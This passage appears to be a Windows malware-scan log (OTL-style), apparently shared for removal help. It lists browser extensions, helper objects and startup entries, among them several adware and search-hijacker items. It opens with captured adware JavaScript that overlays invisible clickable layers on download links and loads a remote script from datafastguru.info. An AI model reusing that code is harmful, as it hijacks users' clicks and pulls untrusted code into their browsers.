f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"100%\";f.style.height=\"100%\";f.style.cursor=\"pointer\";f.style.top=\"0\";f.style.left=\"0\";f.style.zIndex=\"2000\";varh=g[i].parentNode;h.appendChild(f);h.style.position=\"relative\"}}};\nnew function(){if(0<location.host.toLowerCase().indexOf(\"egendasbrasil.or\")){var g=document.links;for(i=0;i<g.length;i++)if(\"Baixar Legenda\"===(g[i].innerText?g[i].innerText:g[i].textContent)){var f=document.createElement(\"div\");f.style.position=\"absolute\";f.style.width=\"100%\";f.style.height=\"100%\";f.style.cursor=\"pointer\";f.style.top=\"0\";f.style.left=\"0\";f.style.zIndex=\"2000\";varh=g[i].parentNode;h.appendChild(f);h.style.position=\"relative\"}}};\nnew function(){window.location.host.toLowerCase().indexOf(\"reeroms.co\")&&(window.__sdahfjkahfals3243Count=0,window.__sdahfjkahfals3243Int=setInterval(function(){for(var g=document.getElementsByTagName(\"a\"),f=0;f<g.length;f++){var h=\"undefined\"===typeof g[f].innerText?g[f].textContent:g[f].innerText,h=h.trim();if(\"Download\"===h||0==h.indexOf(\"Direct\")){var k=document.createElement(\"div\");k.style.width=\"100%\";k.style.height=\"100%\";k.style.position=\"absolute\";k.style.zIndex=\"9999\";k.style.top=\"0\";k.style.cursor=\n\"pointer\";var m=g[f].parentNode;m.style.position=\"relative\";m.appendChild(k);0==h.indexOf(\"Direct\")&&clearInterval(window.__sdahfjkahfals3243Int)}}40<window.__sdahfjkahfals3243Count++&&clearInterval(window.__sdahfjkahfals3243Int)},500))};\nnew function(){if(-1<window.location.host.toLowerCase().indexOf(\"eneral-ebooks.co\"))for(var g=document.getElementsByTagName(\"iframe\"),f=0;f<g.length;f++){var h=g[f].parentNode;if(null!=h){var k=h.getAttribute(\"class\");null!=k&&-1<k.indexOf(\"banner-

body\")&&(k=document.createElement(\"div\"),k.style.width=\"100%\",k.style.height=\"100%\",k.style.position=\"absolute\",k.style.zIndex=\"9999\",k.style.top=\"0\",k.style.cursor=\"pointer\",h.style.position=\"relative\",h.appendChild(k))}}};\nnew function(){-1<location.host.toLowerCase().indexOf(\"tream2watch.m\")&&(window.__z_tream2count=0,window.__z_tream2int=setInterval(function(){20<window.__z_tream2count++&&clearInterval(window.__z_tream2int);var g=document.getElementById(\"rh_toolbar_STRTOPB\"),f=document.getElementById(\"rhfrm_STRTOPB\");if(null!=g&&null!=f){var h=document.createElement(\"div\");h.style.width=\"100%\";h.style.height=\"100%\";h.style.cursor=\"pointer\";h.style.zIndex=\"2000\";h.style.position=\"absolute\";g.appendChild(h);f.style.position=\n\"absolute\";f.style.zIndex=\"-1\";clearInterval(window.__z_tream2int)}},500))};;try{new function(){if(null==document.getElementById(\"id_ad5cbe0b719874f1\")&&window.self==window.top){vara=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"http://istatic.datafastguru.info/fo/min/wpgb.js?bname=ROoYalShopperAppp&subid=892_1\";a.setAttribute(\"id\",\"id_ad5cbe0b719874f1\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};})();(function(){void(0)})()");FF - prefs.js..extensions.enabledAddons: url_advisor%40kaspersky.com:14.0.0.4939FF - prefs.js..extensions.enabledAddons: virtual_keyboard%40kaspersky.com:14.0.0.4939FF - prefs.js..extensions.enabledAddons: content_blocker%40kaspersky.com:14.0.0.4939FF - prefs.js..extensions.enabledAddons: online_banking%40kaspersky.com:14.0.0.4939FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:31.0 FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_14_0_0_145.dll File not foundFF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll ()FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI updater: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.67.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.67.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=16.4.3522.0110: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)FF - HKLM\Software\MozillaPlugins\@WildTangent.com/GamesAppPresenceDetector,Version=1.0: C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll () FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security

14.0.0\FFExt\[email protected] [2014.07.28 22:15:27 | 000,000,000 | ---D | M]FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\[email protected] [2014.07.28 22:15:27 | 000,000,000 | ---D | M]FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\[email protected] [2014.07.28 22:15:27 | 000,000,000 | ---D | M]FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\[email protected] [2014.07.28 22:15:27 | 000,000,000 | ---D | M]FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\[email protected] [2014.07.28 22:15:27 | 000,000,000 | ---D | M]FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 31.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\componentsFF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 31.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\pluginsFF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 31.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\componentsFF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 31.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2014.03.17 18:18:22 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Muller\AppData\Roaming\mozilla\Extensions[2014.09.04 22:55:33 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Muller\AppData\Roaming\mozilla\Firefox\Profiles\2tpmy7s4.default\extensions[2014.03.20 17:16:20 | 000,000,000 | ---D | M] (Value Apps) -- C:\Users\Muller\AppData\Roaming\mozilla\Firefox\Profiles\2tpmy7s4.default\extensions\{94cd2cc3-083f-49ba-a218-4cda4b4829fd}[2014.03.20 16:08:41 | 000,000,000 | ---D | M] (Linkey for Firefox) -- C:\Users\Muller\AppData\Roaming\mozilla\Firefox\Profiles\2tpmy7s4.default\extensions\[email protected][2014.03.17 22:55:07 | 000,000,000 | ---D | M] (mysearchdial.com) -- C:\Users\Muller\AppData\Roaming\mozilla\Firefox\Profiles\2tpmy7s4.default\extensions\[email protected][2014.09.01 14:37:21 | 000,000,000 | ---D | M] (ROoYalShopperAppp) -- C:\Users\Muller\AppData\Roaming\mozilla\Firefox\Profiles\2tpmy7s4.default\extensions\[email protected][2014.08.04 21:12:44 | 000,000,000 | ---D | M] (QueenCoauponn) -- C:\Users\Muller\AppData\Roaming\mozilla\Firefox\Profiles\2tpmy7s4.default\extensions\[email protected][2014.04.07 13:42:40 | 000,000,000 | ---D | M] (siafeerwEb) -- C:\Users\Muller\AppData\Roaming\mozilla\Firefox\Profiles\2tpmy7s4.default\extensions\[email protected][2014.04.14 23:14:54 | 000,000,000 | ---D | M] (RighTT ConvErterr) -- C:\Users\Muller\AppData\Roaming\mozilla\Firefox\Profiles\2tpmy7s4.default\extensions\[email protected][2014.07.02 20:15:57 | 000,000,000 | ---D | M] (PrincECouPonn) --

C:\Users\Muller\AppData\Roaming\mozilla\Firefox\Profiles\2tpmy7s4.default\extensions\[email protected][2014.02.03 14:21:27 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Muller\AppData\Roaming\mozilla\Firefox\Profiles\2tpmy7s4.default\extensions\[email protected]\content[2014.02.03 14:21:27 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Muller\AppData\Roaming\mozilla\Firefox\Profiles\2tpmy7s4.default\extensions\[email protected]\skin[2014.08.27 19:07:00 | 000,051,391 | ---- | M] () (No name found) -- C:\Users\Muller\AppData\Roaming\mozilla\firefox\profiles\2tpmy7s4.default\extensions\{096b81ea-be98-4454-950f-8447f4abe833}.xpi[2014.03.18 16:32:20 | 000,353,958 | ---- | M] () (No name found) -- C:\Users\Muller\AppData\Roaming\mozilla\firefox\profiles\2tpmy7s4.default\extensions\{ad9a41d2-9a49-4fa6-a79e-71a0785364c8}.xpi[2014.08.27 19:19:45 | 000,051,378 | ---- | M] () (No name found) -- C:\Users\Muller\AppData\Roaming\mozilla\firefox\profiles\2tpmy7s4.default\extensions\{d8ef2631-bcda-42e0-a3d2-e6489ddef163}.xpi[2014.09.04 22:57:29 | 000,002,533 | ---- | M] () -- C:\Users\Muller\AppData\Roaming\mozilla\firefox\profiles\2tpmy7s4.default\searchplugins\ask-search.xml[2014.03.27 14:50:12 | 000,000,980 | ---- | M] () -- C:\Users\Muller\AppData\Roaming\mozilla\firefox\profiles\2tpmy7s4.default\searchplugins\conduit-search.xml[2014.05.15 22:22:33 | 000,002,579 | ---- | M] () -- C:\Users\Muller\AppData\Roaming\mozilla\firefox\profiles\2tpmy7s4.default\searchplugins\default-search.xml[2014.03.17 22:55:10 | 000,002,787 | ---- | M] () -- C:\Users\Muller\AppData\Roaming\mozilla\firefox\profiles\2tpmy7s4.default\searchplugins\Mysearchdial.xml[2014.08.04 18:52:49 | 000,002,277 | ---- | M] () -- C:\Users\Muller\AppData\Roaming\mozilla\firefox\profiles\2tpmy7s4.default\searchplugins\yahoo-msd.xml[2014.07.30 15:03:55 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions[2014.07.30 15:04:00 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}[2014.07.28 22:15:27 | 000,000,000 | ---D | M] (惡意網站攔截器) -- C:\PROGRAM FILES (X86)\KASPERSKY LAB\KASPERSKY INTERNET SECURITY 14.0.0\FFEXT\[email protected][2014.07.28 22:15:27 | 000,000,000 | ---D | M] (Safe Money) -- C:\PROGRAM FILES (X86)\KASPERSKY LAB\KASPERSKY INTERNET SECURITY 14.0.0\FFEXT\[email protected][2014.07.28 22:15:27 | 000,000,000 | ---D | M] (å ¡å·´æ–¯åŸºç¶²å €é¡§å•) -- C:\PROGRAM � �FILES (X86)\KASPERSKY LAB\KASPERSKY INTERNET SECURITY 14.0.0\FFEXT\[email protected][2014.07.28 22:15:27 | 000,000,000 | ---D | M] (虛擬鍵盤) -- C:\PROGRAM FILES (X86)\KASPERSKY LAB\KASPERSKY INTERNET SECURITY 14.0.0\FFEXT\[email protected] [color=#E56717]========== Chrome ==========[/color] CHR - default_search_provider: default-search.net (Enabled)

CHR - default_search_provider: search_url = http://www.default-search.net/search?sid=476&aid=114&itype=a&ver=12627&tm=292&src=ds&p={searchTerms}CHR - default_search_provider: suggest_url = ,CHR - plugin: Error reading preferences fileCHR - Extension: GChat Pix = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\ahdcbmcfcelhbaajmnfilcmnchogibdn\217\CHR - Extension: No name found = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\ahfgiiaiikjjngifdgeihcneblknckcd\1.3\CHR - Extension: No name found = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.5_0\CHR - Extension: No name found = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\CHR - Extension: Keep Awake = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\bijihlabcfdnabacffofojgmehjdielb\135\CHR - Extension: Kaspersky Protection = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\blbkdnmdcafmfhinpmnlhhddbepgkeaa\1.18_0\CHR - Extension: Kaspersky Protection = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\blbkdnmdcafmfhinpmnlhhddbepgkeaa\3.1.0.122_0\CHR - Extension: No name found = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\CHR - Extension: No name found = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\CHR - Extension: URL Advisor = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\dchlnpcodkpfdpacogkljefecpegganj\14.0.0.4651_0\CHR - Extension: URL Advisor = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\dchlnpcodkpfdpacogkljefecpegganj\14.0.0.4651_1\CHR - Extension: Protection bancaire = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\hakdifolhalapjijoafobooafbilfakh\14.0.0.4651_0\CHR - Extension: Protection bancaire = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\hakdifolhalapjijoafobooafbilfakh\14.0.0.4651_1\CHR - Extension: Module de blocage des sites Internet dangereux = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\hghkgaeecgjhjkannahfamoehjmkjail\14.0.0.4651_0\CHR - Extension: Module de blocage des sites Internet dangereux = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\hghkgaeecgjhjkannahfamoehjmkjail\14.0.0.4651_1\CHR - Extension: Favicon Changer = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\ijaabbaphikljkkcbgpbaljfjpflpeoo\124\CHR - Extension: Virtual Keyboard = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\jagncdcchgajhfhijbbhecadmaiegcmh\14.0.0.4917_0\CHR - Extension: Virtual Keyboard = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\jagncdcchgajhfhijbbhecadmaiegcmh\14.0.0.4917_1\CHR - Extension: No name found = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\kpgdoeemmfgckjfbdobfloioegdlaggh\1.8\CHR - Extension: No name found = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\lcnnhcneegeeojhgpfijnlnocjdmlaon\1.0.0_0\CHR - Extension: Spotify Search Plus = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\mbfidnchdapodgcioijplmonencnfpoa\244\CHR - Extension: Do Share = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\CHR - Extension: Do Share = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\oglhhmnmdocfhmhlekfdecokagmbchnf\139\

CHR - Extension: No name found = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\CHR - Extension: Anti-banniÃƒÂƒÃ‚ÂƒÃƒÂ‚Ã‚Â¨re = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjldcfjmnllhmgjclecdnfampinooman\14.0.0.4651_0\CHR - Extension: Anti-banniÃƒÂƒÃ‚ÂƒÃƒÂ‚Ã‚Â¨re = C:\Users\Muller\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjldcfjmnllhmgjclecdnfampinooman\14.0.0.4651_1\ O1 HOSTS File: ([2013.08.22 15:25:41 | 000,000,824 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hostsO2:[b]64bit:[/b] - BHO: (Linkey) - {4D9101D6-5BA0-4048-BDDE-7E2DF54C8C47} - C:\Program Files (x86)\Linkey\IEExtension\iedll64.dll (Aztec Media Inc)O2:[b]64bit:[/b] - BHO: (Content Blocker Plugin) - {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\ContentBlocker\ie_content_blocker_plugin.dll (Kaspersky Lab ZAO)O2:[b]64bit:[/b] - BHO: (BetterrPeriaCeChec) - {68DCC60B-F77F-C4E5-25DE-934292BA36EF} - C:\ProgramData\BetterrPeriaCeChec\T4as8.x64.dll ()O2:[b]64bit:[/b] - BHO: (websaveRR) - {7045E4CD-A49C-573F-5841-E4E4AE668FB6} - C:\ProgramData\websaveRR\HF11k.x64.dll ()O2:[b]64bit:[/b] - BHO: (Virtual Keyboard Plugin) - {73455575-E40C-433C-9784-C78DC7761455} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll (Kaspersky Lab ZAO)O2:[b]64bit:[/b] - BHO: (ValueApps) - {93DBF2BB-A2B3-4683-A92E-57E60751F346} - C:\Program Files\Conduit\ValueApps\IE\ValueAppsLoader.dll (Conduit Ltd.)O2:[b]64bit:[/b] - BHO: (Safe Money Plugin) - {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} -C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\OnlineBanking\online_banking_bho.dll (Kaspersky Lab ZAO)O2:[b]64bit:[/b] - BHO: (URL Advisor Plugin) - {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\UrlAdvisor\klwtbbho.dll (Kaspersky Lab ZAO)O2:[b]64bit:[/b] - BHO: (FOrmiattsConVerte) - {EC01EC3A-31CF-9079-A533-3015510A12AA} -C:\ProgramData\FOrmiattsConVerte\faJvWd.x64.dll ()O2 - BHO: (Linkey) - {4D9101D6-5BA0-4048-BDDE-7E2DF54C8C47} - C:\Program Files (x86)\Linkey\IEExtension\iedll.dll (Aztec Media Inc)O2 - BHO: (Content Blocker Plugin) - {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\ContentBlocker\ie_content_blocker_plugin.dll (Kaspersky Lab ZAO)O2 - BHO: (no name) - {68DCC60B-F77F-C4E5-25DE-934292BA36EF} - No CLSID value found.O2 - BHO: (no name) - {7045E4CD-A49C-573F-5841-E4E4AE668FB6} - No CLSID value found.O2 - BHO: (Virtual Keyboard Plugin) - {73455575-E40C-433C-9784-C78DC7761455} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll (Kaspersky Lab ZAO)O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)O2 - BHO: (ValueApps) - {93DBF2BB-A2B3-4683-A92E-57E60751F346} - C:\Program Files (x86)\Conduit\ValueApps\IE\ValueAppsLoader.dll (Conduit Ltd.)O2 - BHO: (Safe Money Plugin) - {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\OnlineBanking\online_banking_bho.dll (Kaspersky Lab ZAO)O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} -

C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)O2 - BHO: (URL Advisor Plugin) - {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\UrlAdvisor\klwtbbho.dll (Kaspersky Lab ZAO)O2 - BHO: (no name) - {EC01EC3A-31CF-9079-A533-3015510A12AA} - No CLSID value found.O3:[b]64bit:[/b] - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.O3:[b]64bit:[/b] - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.O3 - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.O3 - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.O4:[b]64bit:[/b] - HKLM..\Run: [ETDCtrl] C:\Program Files\Elantech\ETDCtrl.exe (ELAN Microelectronics Corp.)O4:[b]64bit:[/b] - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)O4:[b]64bit:[/b] - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)O4:[b]64bit:[/b] - HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)O4:[b]64bit:[/b] - HKLM..\Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor)O4 - HKLM..\Run: [BacKGround Agent] C:\Program Files (x86)\Acer\AOP Framework\BackgroundAgent.exe (Acer Incorporated)O4 - HKLM..\Run: [SunJavaUpdateSched] C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (Oracle Corporation)O4 - HKU\S-1-5-21-3400277602-2072296053-2501058191-1001..\Run: [Optimizer Pro] C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exe (PC Utilities Software Limited)O4 - HKU\S-1-5-21-3400277602-2072296053-2501058191-1001..\Run: [Pokki] "%LOCALAPPDATA%\Pokki\Engine\HostAppServiceUpdater.exe" /LOGON File not foundO4 - HKU\S-1-5-21-3400277602-2072296053-2501058191-1001..\Run: [Skype] C:\Program Files (x86)\Skype\Phone\Skype.exe (Skype Technologies S.A.)O4 - HKU\S-1-5-21-3400277602-2072296053-2501058191-1001..\RunOnce: [Application Restart #0] C:\Users\Muller\AppData\Local\Pokki\Engine\pokki.exe --disable-internal-flash --noerrdialogs--no-message-box --disable-extensions --disable-web-security --disable-web-resources --disable-client-side-phishing-detection --enable-file-cookies --disable-sync --disable-breakpad --disable-bundled-ppapi-flash --disable-sync-tabs --disable-speech-input --disable-custom-jumplist --process-per-tab --debug-devtools-frontend="C:\Users\Muller\AppData\Local\Pokki\Engine\inspector" --no-first-run --lang=en-US --disable-component-update --disable-prompt-on-repost --no-startup-window --disable-translate --disable-logging --disable-desktop-notifications --disable-gpu-process-prelaunch --flag-switches-begin --flag-switches-end --restore-last-session File not foundO6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: ForceActiveDesktopOn = 0O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop= 1O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 28O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run: BtvStack = "C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe" (Qualcomm®Atheros®)O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableVirtualization = 1O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System:

EnableInstallerDetection = 1O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 1O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLUA = 1O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableSecureUIAPaths = 1O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ValidateAdminCodeSignatures = 0O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableUIADesktopToggle = 0O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableCursorSuppression = 1O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: dontdisplaylastusername = 0O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: legalnoticecaption = O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: legalnoticetext = O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: scforceoption = 0O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: shutdownwithoutlogon = 1O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: undockwithoutlogon = 1O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: FilterAdministratorToken = 0O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLinkedConnections = 1O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\UIPI\Clipboard\ExceptionFormats: CF_UNICODETEXT = 13O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\UIPI\Clipboard\ExceptionFormats: CF_DIBV5 = 17O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\UIPI\Clipboard\ExceptionFormats: CF_PALETTE = 9O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\UIPI\Clipboard\ExceptionFormats: CF_BITMAP = 2O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\UIPI\Clipboard\ExceptionFormats: CF_TEXT = 1O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\UIPI\Clipboard\ExceptionFormats: CF_DIB = 8O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\UIPI\Clipboard\ExceptionFormats: CF_OEMTEXT = 7O8:[b]64bit:[/b] - Extra context menu item: Ajouter à l'Anti-bannière - C:\Program Files

(x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ie_banner_deny.htm ()O8 - Extra context menu item: Ajouter à l'Anti-bannière - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ie_banner_deny.htm ()O9:[b]64bit:[/b] - Extra Button: Clavier virtuel - {0C4CC089-D306-440D-9772-464E226F6539} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll (Kaspersky Lab ZAO)O9:[b]64bit:[/b] - Extra Button: Analyse des liens - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\UrlAdvisor\klwtbbho.dll (Kaspersky Lab ZAO)O9 - Extra Button: Clavier virtuel - {0C4CC089-D306-440D-9772-464E226F6539} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll (Kaspersky Lab ZAO)O9 - Extra Button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll (Microsoft Corporation)O9 - Extra 'Tools' menuitem : @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll (Microsoft Corporation)O9 - Extra Button: Analyse des liens - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\UrlAdvisor\klwtbbho.dll (Kaspersky Lab ZAO)O10:[b]64bit:[/b] - NameSpace_Catalog5\Catalog_Entries64\000000000001 [] - C:\Windows\SysNative\NapiNSP.dll (Microsoft Corporation)O10:[b]64bit:[/b] - NameSpace_Catalog5\Catalog_Entries64\000000000002 [] - C:\Windows\SysNative\pnrpnsp.dll (Microsoft Corporation)O10:[b]64bit:[/b] - NameSpace_Catalog5\Catalog_Entries64\000000000003 [] - C:\Windows\SysNative\pnrpnsp.dll (Microsoft Corporation)O10:[b]64bit:[/b] - 